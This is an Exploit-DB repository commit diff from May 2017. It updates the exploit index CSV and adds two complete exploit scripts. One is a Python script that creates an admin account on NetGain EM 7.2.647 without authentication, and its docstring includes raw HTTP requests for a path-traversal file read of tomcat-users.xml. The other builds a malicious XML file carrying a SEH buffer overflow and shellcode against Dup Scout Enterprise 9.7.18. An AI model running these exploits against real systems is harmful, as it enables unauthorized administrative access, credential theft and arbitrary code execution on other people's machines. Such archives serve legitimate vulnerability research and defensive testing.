DB: 2017-05-25

2 new exploits

Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)
Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)

Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service
Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service

Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow

NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion

files.csv

@@ -2200,7 +2200,7 @@ id,file,description,date,author,platform,type,port
 18878,platforms/windows/dos/18878.txt,"Pro-face Pro-Server EX WinGP PC Runtime - Multiple Vulnerabilities",2012-05-14,"Luigi Auriemma",windows,dos,0
 18890,platforms/multiple/dos/18890.txt,"Java - Trigerring Java Code from a .SVG Image",2012-05-16,"Nicolas Gregoire",multiple,dos,0
 18909,platforms/php/dos/18909.php,"PHP 5.4.3 - wddx_serialize_* / stream_bucket_* Variant Object Null Ptr Dereference",2012-05-21,condis,php,dos,0
-18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption LPE (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
+18894,platforms/windows/dos/18894.txt,"Microsoft Windows XP - Keyboard Layouts Pool Corruption (PoC) (MS12-034)",2012-05-18,Cr4sh,windows,dos,0
 18902,platforms/windows/dos/18902.rb,"Real-DRAW PRO 5.2.4 - Import File Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18903,platforms/windows/dos/18903.rb,"DVD-Lab Studio 1.25 - '.DAL' File Open Crash",2012-05-21,"Ahmed Elhady Mohamed",windows,dos,0
 18910,platforms/php/dos/18910.php,"PHP 5.4.3 - (com_event_sink) Denial of Service",2012-05-21,condis,php,dos,0
@@ -3586,7 +3586,7 @@ id,file,description,date,author,platform,type,port
 28194,platforms/windows/dos/28194.txt,"Microsoft Internet Explorer 6 - RDS.DataControl Denial of Service",2006-07-08,hdm,windows,dos,0
 28196,platforms/windows/dos/28196.txt,"Microsoft Internet Explorer 6 - DirectAnimation.DAUserData Denial of Service",2006-07-08,hdm,windows,dos,0
 28197,platforms/windows/dos/28197.txt,"Microsoft Internet Explorer 6 - Object.Microsoft.DXTFilter Denial of Service",2006-07-09,hdm,windows,dos,0
-28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - HtmlDlgSafeHelper Remote Denial of Service",2006-07-10,hdm,windows,dos,0
+28202,platforms/windows/dos/28202.txt,"Microsoft Internet Explorer 6 - 'HtmlDlgSafeHelper' Remote Denial of Service",2006-07-10,hdm,windows,dos,0
 28207,platforms/windows/dos/28207.txt,"Microsoft Internet Explorer 6 - TriEditDocument Denial of Service",2006-07-11,hdm,windows,dos,0
 28213,platforms/windows/dos/28213.txt,"Microsoft Internet Explorer 6 - RevealTrans Denial of Service",2006-07-12,hdm,windows,dos,0
 28220,platforms/linux/dos/28220.txt,"KDE Konqueror 3.5.x - ReplaceChild Denial of Service",2006-07-14,hdm,linux,dos,0
@@ -9008,6 +9008,7 @@ id,file,description,date,author,platform,type,port
 42020,platforms/windows/local/42020.cpp,"Microsoft Windows - COM Aggregate Marshaler/IRemUnknown2 Type Confusion Privilege Escalation",2017-05-17,"Google Security Research",windows,local,0
 42045,platforms/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation",2017-05-22,"Google Security Research",linux,local,0
 42053,platforms/linux/local/42053.c,"KDE 4/5 - 'KAuth' Privilege Escalation",2017-05-18,Stealth,linux,local,0
+42059,platforms/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,windows,local,0
 1,platforms/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Exploit",2003-03-23,kralor,windows,remote,80
 2,platforms/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote Exploit (PoC)",2003-03-24,RoMaNSoFt,windows,remote,80
 5,platforms/windows/remote/5.c,"Microsoft Windows - RPC Locator Service Remote Exploit",2003-04-03,"Marcin Wolak",windows,remote,139
@@ -37778,6 +37779,7 @@ id,file,description,date,author,platform,type,port
 41697,platforms/linux/webapps/41697.rb,"SixApart MovableType < 5.2.12 - Storable Perl Code Execution (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41698,platforms/linux/webapps/41698.rb,"WordPress Theme Holding Pattern - Arbitrary File Upload (Metasploit)",2015-02-11,Metasploit,linux,webapps,0
 41714,platforms/windows/webapps/41714.rb,"Distinct TFTP 3.10 - Writable Directory Traversal Execution (Metasploit)",2012-04-08,Metasploit,windows,webapps,0
+42058,platforms/jsp/webapps/42058.py,"NetGain EM 7.2.647 build 941 - Authentication Bypass / Local File Inclusion",2017-05-24,f3ci,jsp,webapps,0
 41899,platforms/multiple/webapps/41899.html,"Apple WebKit / Safari 10.0.2(12602.3.12.0.1) - 'PrototypeMap::createEmptyStructure' Universal Cross-Site Scripting",2017-04-20,"Google Security Research",multiple,webapps,0
 41716,platforms/php/webapps/41716.txt,"Gr8 Tutorial Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0
 41717,platforms/php/webapps/41717.txt,"Gr8 Gallery Script - SQL Injection",2017-03-24,"Ihsan Sencan",php,webapps,0

platforms/jsp/webapps/42058.py

@@ -0,0 +1,122 @@
+'''
+# Exploit Title: Add User Account with Admin Privilege without Login & Local File Inclusion
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+
+Add User Account with Admin Privilege without Login
+----------------------------------------------
+We can create user and give admin privilege to user which we have made
+without login.
+Because this app does not check the session on this request
+
+
+Local File Inclusion
+----------------------------------------------
+Normal Request:
+
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Cookie: JSESSIONID=8A172EB8DDBD08D1E6D25A1CE8CC74AC
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+
+filename=iossd.log
+
+We can download another file with change value on filename parameter and
+also we can send this request without login.
+
+Example:
+
+POST /u/jsp/log/download_do.jsp HTTP/1.1
+Host: 192.168.0.21:8081
+User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101
+Firefox/45.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://192.168.0.21:8081/u/index.jsp
+Connection: close
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 18
+
+filename=../../tomcat/conf/tomcat-users.xml
+'''
+#!/usr/local/bin/python
+# Exploit Title: Add User Account with Admin Privilege without Login
+# Date: 2017-05-21
+# Exploit Author: f3ci
+# Vendor Homepage: http://www.netgain-systems.com
+# Software Link: http://www.netgain-systems.com/free-edition-download/
+# Version: <= v7.2.647 build 941
+# Tested on: Windows 7
+
+import requests
+import sys
+
+try:
+ def create():
+	ip = str(sys.argv[1])
+	port = str(sys.argv[2])
+	user = str(sys.argv[3])
+	passwd = str(sys.argv[4])
+
+	print "\033[1;32m[+]\033[1;m Try to Create user"
+	url="http://"+ip+":"+port+"/u/jsp/security/user_save_do.jsp"
+	data= {
+    	'new': "true", 
+    	'id': "", 
+    	'name': user, 
+    	'dname': "foobar", 
+    	'password': passwd, 
+    	'password2': passwd, 
+    	'description': "", 
+    	'emails': "foo@bar.com", 
+    	'mobileNumber': "000000", 
+    	'loginAttempts': "5",
+    	}
+	response = requests.post(url, data=data)
+	status = response.status_code
+	if status == 200:
+		print "\033[1;32m[+]\033[1;m Success!!"
+		role()
+	else:
+		print "\033[91m[-]\033[91;m Create User Failed"
+
+
+ def role():
+	ip = str(sys.argv[1])
+        port = str(sys.argv[2])
+	user = str(sys.argv[3])
+        passwd = str(sys.argv[4])
+
+	print "\033[1;32m[+]\033[1;m Get admin role"
+	url="http://"+ip+":"+port+"/u/jsp/security/role_save_do.jsp"
+	data= {
+    	'name': "admin", 
+    	'description': "Administrator", 
+    	'users': [user,"admin"],
+    	}
+	response = requests.post(url, data=data)
+	status = response.status_code
+	if status == 200:
+		print "\033[1;32m[+]\033[1;m Success!!"
+		print "\033[1;32m[+]\033[1;m Login with user:" +user+ " password:" + passwd
+	else:
+		print "\033[91m[-]\033[91;m Get admin role Failed"
+
+ create();
+
+except:
+	print "\033[91m[!]\033[91;m Usage: %s <IP> <port> <username> <password>" % str(sys.argv[0])
+	print "\033[91m[!]\033[91;m Ex: %s 127.0.0.1 8081 foobar passw0rd" % str(sys.argv[0])

platforms/windows/local/42059.py

@@ -0,0 +1,60 @@
+author = '''
+  
+                ##############################################
+                #    Created: ScrR1pTK1dd13                  #
+                #    Name: Greg Priest                       #
+                #    Mail: ScR1pTK1dd13.slammer@gmail.com    # 
+                ##############################################
+  
+# Exploit Title: Dup Scout Enterprise v9.7.18 Import Local Buffer Overflow Vuln.(SEH)
+# Date: 2017.05.24
+# Exploit Author: Greg Priest
+# Version: Dup Scout Enterprise v9.7.18
+# Tested on: Windows7 x64 HUN/ENG Professional
+'''
+
+
+import os
+import struct
+
+overflow = "A" * 1536
+jmp_esp = "\x94\x21\x1C\x65"
+#651F20E5 
+#651F214E
+#652041ED
+nop = "\x90" * 16
+esp = "\x8D\x44\x24\x4A"
+jmp = "\xFF\xE0"
+nop2 = "\x90" * 70
+nSEH = "\x90\x90\xEB\x05"
+SEH = "\x80\x5F\x1C\x90"
+#"\x80\x5F\x1C\x65"
+#6508F78D
+#650E129F
+#651C5F80
+shellcode =(
+"\x31\xdb\x64\x8b\x7b\x30\x8b\x7f" +
+"\x0c\x8b\x7f\x1c\x8b\x47\x08\x8b" +
+"\x77\x20\x8b\x3f\x80\x7e\x0c\x33" +
+"\x75\xf2\x89\xc7\x03\x78\x3c\x8b" +
+"\x57\x78\x01\xc2\x8b\x7a\x20\x01" +
+"\xc7\x89\xdd\x8b\x34\xaf\x01\xc6" +
+"\x45\x81\x3e\x43\x72\x65\x61\x75" +
+"\xf2\x81\x7e\x08\x6f\x63\x65\x73" +
+"\x75\xe9\x8b\x7a\x24\x01\xc7\x66" +
+"\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7" +
+"\x8b\x7c\xaf\xfc\x01\xc7\x89\xd9" +
+"\xb1\xff\x53\xe2\xfd\x68\x63\x61" +
+"\x6c\x63\x89\xe2\x52\x52\x53\x53" +
+"\x53\x53\x53\x53\x52\x53\xff\xd7")
+
+crash = overflow+jmp_esp+nop+esp+jmp+nop2+nSEH+SEH+"\x90" * 10+shellcode
+
+evil = '<?xml version="1.0" encoding="UTF-8"?>\n<classify\nname=\'' + crash + '\n</classify>'
+exploit = open('Ev1l.xml', 'w')
+exploit.write(evil)
+exploit.close()
+
+print "Ev1l.xml raedy!"
+
+